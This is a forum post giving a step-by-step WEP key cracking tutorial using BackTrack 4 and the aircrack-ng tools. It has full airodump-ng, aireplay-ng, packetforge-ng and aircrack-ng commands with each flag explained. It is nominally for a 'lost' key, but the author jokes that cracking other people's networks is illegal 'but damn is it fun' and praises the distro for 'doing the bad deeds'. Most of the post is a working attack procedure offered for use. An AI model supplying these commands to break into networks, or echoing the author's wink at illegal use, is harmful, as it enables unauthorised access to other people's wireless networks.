LinkBack URL
About LinkBacks
Cracking your Lost Wep Key
This topic is for those who are wanting to know how to crack a Wep key. (Please note: Cracking others wireless networks and using it for your own fun, is illegal, and can be bad. But damn is it fun)
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
Note: This might not work for you, there are a few reasons as to why, but the main reason normally is your wireless card is not supported in linux. Please do not come crying to me if it does not work and you did all this work.
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
Ok First off you will need a wonderful linux distro, I recomend BackTrack 4
http://www.remote-exploit.org/backtrack_download.html
This baby works wonders and is a awesome Slackware distro has everything you could need for doing the bad deeds.
You can just burn this .iso to a dvd or install it to a thumb drive.
a Usb drive, Memery stick what ever you call it, I call it a thumb drive)
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
I will explain how to install it a thumb drive what you need is.
1) =bt4-pre-final.iso=
2) =UnetBootin=
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
Step 1
Ok once you have these files what you are going to do is
1) Open UnetBootin
2) Load the .iso into the application, you are to click on the disk image button, look at the pic provided
[imgw]http://i32.tinypic.com/15hlkp5.png[/imgw]
3) Make sure to select the right drive
[imgw]http://i26.tinypic.com/8x7ksy.png[/imgw]
4) Once you have selected the right Drive from the list Click OK
5) This might take a few minuets just wait it will tell you when it is done.
6) You are done
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
Now, you have your dvd, or your Thumb drive and you are ready to boot up backtrack.
If you have the dvd, just put it into the drive and make sure to boot from it, if you are using the usb thumb drive then just make sure you can boot from it.
once backtrack4 boots up (might be missing a step here but I will fill it in once I get it downloaded again but I think it just boots right in I do not remember sadly)
Once the full screen is showing you your desktop, click on what is basically the start bar to the bottom left, and it should open up just like the start bar would normally open in windows.
Once that is open click on the terminal icon and follow these wonderful instructions.
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
1. Type in “airmon-ng” to see wireless adaptors on your computer.
2. You should see a listing come up. Mine showed wlan0. Yours may be different, such a rausb0.
Type in “airmon-ng start wlan0” to start your wireless device. Replace the “wlan0” with whatever yours showed to be. This will create a new “virtual” device, and will show the name. The name for mine was “mon0“
3. Open a new terminal window, and type “airodump mon0” again, replacing “mon0” with your new virtual devices name.
----You will begin to see a listing of different APs (access points). Find the one you want and press Control C. Pressing Control C will cancel the current program running in terminal. The name of the networks found is under the ESSID column. You may not see anything there, which is fine, some of them are invisible. FUSiON is the name of my network, so I went over to the BSSID column, and copied the address, which was 00:23:69:18:E4:7D. This address is important, so I could recommend copying it, or writing it down. Also take note of what channel it is on.
4. This is what I typed after that, “airodump-ng –bssid 00:23:69:18:E4:7D –channel 6 –ivs -w FUSiON mon0” This is all real easy stuff, so I’ll just explain it to you right quick. airodump-ng is the program that captures what is called IVs, the primary component in cracking WEP networks. Here goes!
¤¤¤¤¤¤¤¤¤¤¤ Type “airodump-ng”
¤¤¤¤¤¤¤¤¤¤¤ Add a space and type “–bssid 00:23:69:18:E4:7D” replacing the address with the address of your Network. This “flag” says we only want to see this address, and nothing else.
¤¤¤¤¤¤¤¤¤¤¤ Add a space and type “–channel 6″ replacing the number 6 with the number of the channel of your Network (although 6 is VERY common, so don’t be surprised if that is it)
¤¤¤¤¤¤¤¤¤¤¤ Add a space and type “–ivs” This command only captures IVs, which will make cracking the password faster.
¤¤¤¤¤¤¤¤¤¤¤ Add a space and type “-w FUSiON” replacing FUSiON with the name of your network, or something that you will remember, as we will be cracking this file later to find the password. I just use the name of the network, because it helps me remember easier.
¤¤¤¤¤¤¤¤¤¤¤ The “mon0″ at the end, simply defines which device to use.
5. Open a New Terminal Window. In it, type “aireplay-ng -5 -b 00:23:69:18:E4:7D mon0″
¤¤¤¤¤¤¤¤¤¤¤ aireplay-ng is a tool that greatly helps generate IVs. Without it, it wouldn’t be possible to crack most WEP networks.
¤¤¤¤¤¤¤¤¤¤¤ The “-5″ flag is one method, and the most common, that is used to generate the IVs.
¤¤¤¤¤¤¤¤¤¤¤ The “-b 00:23:69:18:E4:7D” tells which address to attack. The -b stands for bssid which is the address of your network. So you will have to replace 00:23:69:18:E4:7D with the address of your network (the one that I recommended you write down or copy earlier).
¤¤¤¤¤¤¤¤¤¤¤ The “mon0″ at the end, again just defines which device to use.
6. Wait and Press “Y” for yes, when it asks if you would like to use the selected frame.
7. This process may have to be repeated until you have a resulting fragment file. It will say when you do. Additionally, you can run this command “aireplay-ng -1 1 -a 00:23:69:18:E4:7D mon0″ to help assist with getting a fragment file. Again, make sure to replace my address, with your own.
8. Now we must build a file that will be used to gather those precious IVs! I did it with the following command:
“packetforge-ng -0 -a 00:23:69:18:E4:7D -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0324-230256.xor -w arpy”
Let me break this down for you.
¤¤¤¤¤¤¤¤¤¤¤ packetforge-ng is the program which will build the arp file, as I like to call it, which you will soon see.
¤¤¤¤¤¤¤¤¤¤¤ Add a space, and follow it with “-0 -a 00:23:69:18:E4:7D” and of course, replace it with your own network address.
¤¤¤¤¤¤¤¤¤¤¤ Add a space, and type in “-h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255″ This part of the command is pretty universal, rarely is it changed. So we won’t go into detail on it here.
¤¤¤¤¤¤¤¤¤¤¤ Add a space, and type in “-y fragment-XXXX-XXXXXX.xor”, replacing your fragment file, place of this one, as well.
¤¤¤¤¤¤¤¤¤¤¤ And lastly, type in “-w arpy” just the -w is important. The arpy can be anything you can remember. It’s something I’ve just always used, cuz it’s easy for me to remember.
¤¤¤¤¤¤¤¤¤¤¤ If all goes well, it Successfully built our Arp Packet.
9. Almost Done! “aireplay-ng -3 -r arpy -b 00:23:69:18:E4:7D mon0″ is our next command.
¤¤¤¤¤¤¤¤¤¤¤ aireplay-ng, like before, should get those IVs flowing in. At an average, I see about 500 IVs/Second. Which isn’t too bad. But some cards do better than others, so you may have better, or worse luck.
¤¤¤¤¤¤¤¤¤¤¤ -r arpy is a flag that tells aireplay-ng to play the arp file we created called arpy.
¤¤¤¤¤¤¤¤¤¤¤ Like before, -b 00:23:69:18:E4:7D specifies which address to attack, and mon0 says which wireless interface to use.
10. If all went well, we are gathering IVs! Open the airodump-ng terminal window that we’ve had open, and look at the Data column. It should be constantly rising. This is the longest process, as we have to wait. While others recommend you getting at least 100,000 IVs, I’ve never waited that long. I’ve cracked many WEPs at just 20,000, although I recommend cracking at 40,000 IVs. So go get a Dr. Pepper and wait a while until you have enough accumilated.
11. Once you have at least 40,000, we can start cracking the WEP Password!
¤¤¤¤¤¤¤¤¤¤¤ This step, has to be the simplest.
¤¤¤¤¤¤¤¤¤¤¤ Open a new Terminal window, and type “aircrack-ng XXXX-01.ivs” replacing the XXXX with what you used when you first started the airodump-ng command.
¤¤¤¤¤¤¤¤¤¤¤ Depending on the speed of your computer, you will soon have the WEP Key Decrypted. Just make sure to remove the colons “:” before confirming the Key.
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
If you work better with vistal help then check out these videos
[ame="http://www.youtube.com/watch?v=qe1VuhGciSI&feature=player_embedded"]YouTube - WEP Cracking with Captions and Voice, using Backtrack 4 - Part 1 of 2[/ame] Part1
[ame="http://www.youtube.com/watch?v=7fI7qs9ZF40&feature=player_embedded"]YouTube - WEP Cracking with Captions and Voice, using Backtrack 4 - Part 2 of 2[/ame] part2
¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤ ¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤¤
-This wonderful Walk throw is from Josh Houston I do not want to take credit for this part-
Reply With Quote
